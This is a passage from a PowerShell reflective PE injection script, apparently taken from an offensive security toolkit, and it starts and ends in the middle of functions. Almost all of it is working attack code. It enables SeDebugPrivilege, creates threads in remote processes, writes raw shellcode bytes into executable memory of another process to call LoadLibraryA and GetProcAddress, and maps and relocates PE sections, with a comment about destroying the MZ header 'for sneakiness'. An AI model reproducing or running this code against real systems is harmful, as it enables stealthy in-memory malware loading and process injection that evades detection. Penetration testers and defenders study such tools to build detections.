Write-Output $TypeBuilder.CreateType() } #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-ProcAddress { Param ( [OutputType([IntPtr])] [Parameter( Position = 0, Mandatory = $True )] [String] $Module, [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure ) # Get a reference to System.dll in the GAC $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') # Get a reference to the GetModuleHandle and GetProcAddress methods $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') # Get a handle to the module specified $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } Function Enable-SeDebugPrivilege { Param( [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Constants ) [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke() if ($ThreadHandle -eq [IntPtr]::Zero) { Throw "Unable to get the handle to the current thread" } [IntPtr]$ThreadToken = [IntPtr]::Zero [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) { $Result = $Win32Functions.ImpersonateSelf.Invoke(3) if ($Result -eq $false) { Throw "Unable to impersonate self" } $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { Throw "Unable to OpenThreadToken." } } else { Throw "Unable to OpenThreadToken. Error code: $ErrorCode" } } [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID)) $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid) if ($Result -eq $false) { Throw "Unable to call LookupPrivilegeValue" } [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES) [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES) $TokenPrivileges.PrivilegeCount = 1 $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID) $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true) $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value if (($Result -eq $false) -or ($ErrorCode -ne 0)) { #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) } Function Create-RemoteThread { Param( [Parameter(Position = 1, Mandatory = $true)] [IntPtr] $ProcessHandle, [Parameter(Position = 2, Mandatory = $true)] [IntPtr] $StartAddress, [Parameter(Position = 3, Mandatory = $false)] [IntPtr] $ArgumentPtr = [IntPtr]::Zero, [Parameter(Position = 4, Mandatory = $true)] [System.Object] $Win32Functions ) [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero $OSVersion = [Environment]::OSVersion.Version #Vista and Win7 if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) { #Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress" $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero) $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($RemoteThreadHandle -eq [IntPtr]::Zero) { Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError" } } #XP/Win8 else { #Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress" $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero) } if ($RemoteThreadHandle -eq [IntPtr]::Zero) { Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop } return $RemoteThreadHandle } Function Get-ImageNtHeaders { Param( [Parameter(Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types ) $NtHeadersInfo = New-Object System.Object #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) #Get IMAGE_NT_HEADERS [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64) #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. if ($imageNtHeaders64.Signature -ne 0x00004550) { throw "Invalid IMAGE_NT_HEADER signature." } if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') { $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true } else { $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false } return $NtHeadersInfo } #This function will get the information needed to allocated space in memory for the PE Function Get-PEBasicInfo { Param( [Parameter( Position = 0, Mandatory = $true )] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types ) $PEInfo = New-Object System.Object #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot. [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null #Get NtHeadersInfo $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types #Build a structure with the information which will be needed for allocating memory and writing the PE to memory $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit) $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics) #Free the memory allocated above, this isn't where we allocate the PE to memory [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes) return $PEInfo } #PEInfo must contain the following NoteProperties: # PEHandle: An IntPtr to the address the PE is loaded to in memory Function Get-PEDetailedInfo { Param( [Parameter( Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants ) if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) { throw 'PEHandle is null or IntPtr.Zero' } $PEInfo = New-Object System.Object #Get NtHeaders information $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types #Build the PEInfo object $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) if ($PEInfo.PE64Bit -eq $true) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr } else { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr } if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL) { $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL' } elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) { $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE' } else { Throw "PE file is not an EXE or DLL" } return $PEInfo } Function Import-DllInRemoteProcess { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $RemoteProcHandle, [Parameter(Position=1, Mandatory=$true)] [IntPtr] $ImportDllPathPtr ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1) $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($RImportDllPathPtr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process" } [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten) if ($Success -eq $false) { Throw "Unable to write DLL path to remote process memory" } if ($DllPathSize -ne $NumBytesWritten) { Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" } $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes [IntPtr]$DllAddress = [IntPtr]::Zero #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes. if ($PEInfo.PE64Bit -eq $true) { #Allocate memory for the address returned by LoadLibraryA $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($LoadLibraryARetMem -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA" } #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm) $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) $LoadLibrarySC2 = @(0x48, 0xba) $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba) $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3) $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) if ($Result -eq $false) { Throw "Call to ReadProcessMemory failed" } [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null } else { [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } [Int32]$ExitCode = 0 $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode) if (($Result -eq 0) -or ($ExitCode -eq 0)) { Throw "Call to GetExitCodeThread failed" } [IntPtr]$DllAddress = [IntPtr]$ExitCode } $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null return $DllAddress } Function Get-RemoteProcAddress { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $RemoteProcHandle, [Parameter(Position=1, Mandatory=$true)] [IntPtr] $RemoteDllHandle, [Parameter(Position=2, Mandatory=$true)] [IntPtr] $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing) [Parameter(Position=3, Mandatory=$true)] [Bool] $LoadByOrdinal ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) [IntPtr]$RFuncNamePtr = [IntPtr]::Zero #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal #If not loading by ordinal, write the function name to the remote process memory if (-not $LoadByOrdinal) { $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr) #Write FunctionName to memory (will be used in GetProcAddress) $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1) $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($RFuncNamePtr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process" } [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten) if ($Success -eq $false) { Throw "Unable to write DLL path to remote process memory" } if ($FunctionNameSize -ne $NumBytesWritten) { Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" } } #If loading by ordinal, just set RFuncNamePtr to be the ordinal number else { $RFuncNamePtr = $FunctionNamePtr } #Get address of GetProcAddress $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes #Allocate memory for the address returned by GetProcAddress $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($GetProcAddressRetMem -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress" } #Write Shellcode to the remote process which will call GetProcAddress #Shellcode: GetProcAddress.asm [Byte[]]$GetProcAddressSC = @() if ($PEInfo.PE64Bit -eq $true) { $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) $GetProcAddressSC2 = @(0x48, 0xba) $GetProcAddressSC3 = @(0x48, 0xb8) $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9) $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3) } else { $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8) $GetProcAddressSC2 = @(0xb9) $GetProcAddressSC3 = @(0x51, 0x50, 0xb8) $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9) $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3) } $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) if (($Result -eq $false) -or ($NumBytesWritten -eq 0)) { Throw "Call to ReadProcessMemory failed" } [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) #Cleanup remote process memory $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null if (-not $LoadByOrdinal) { $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null } return $ProcAddress } Function Copy-Sections { Param( [Parameter(Position = 0, Mandatory = $true)] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) #Address to copy the section to [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress)) #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, # so truncate SizeOfRawData to VirtualSize $SizeOfRawData = $SectionHeader.SizeOfRawData if ($SectionHeader.PointerToRawData -eq 0) { $SizeOfRawData = 0 } if ($SizeOfRawData -gt $SectionHeader.VirtualSize) { $SizeOfRawData = $SectionHeader.VirtualSize } if ($SizeOfRawData -gt 0) { Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) } #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) { $Difference = $SectionHeader.VirtualSize - $SizeOfRawData [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null } } } Function Update-MemoryAddresses { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [Int64] $OriginalImageBase, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) [Int64]$BaseDifference = 0 $AddDifference = $true #Track if the difference variable should be added or subtracted from variables [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION) #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) ` -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) { return } elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true) { $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle) $AddDifference = $false } elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true) { $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase) } #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned 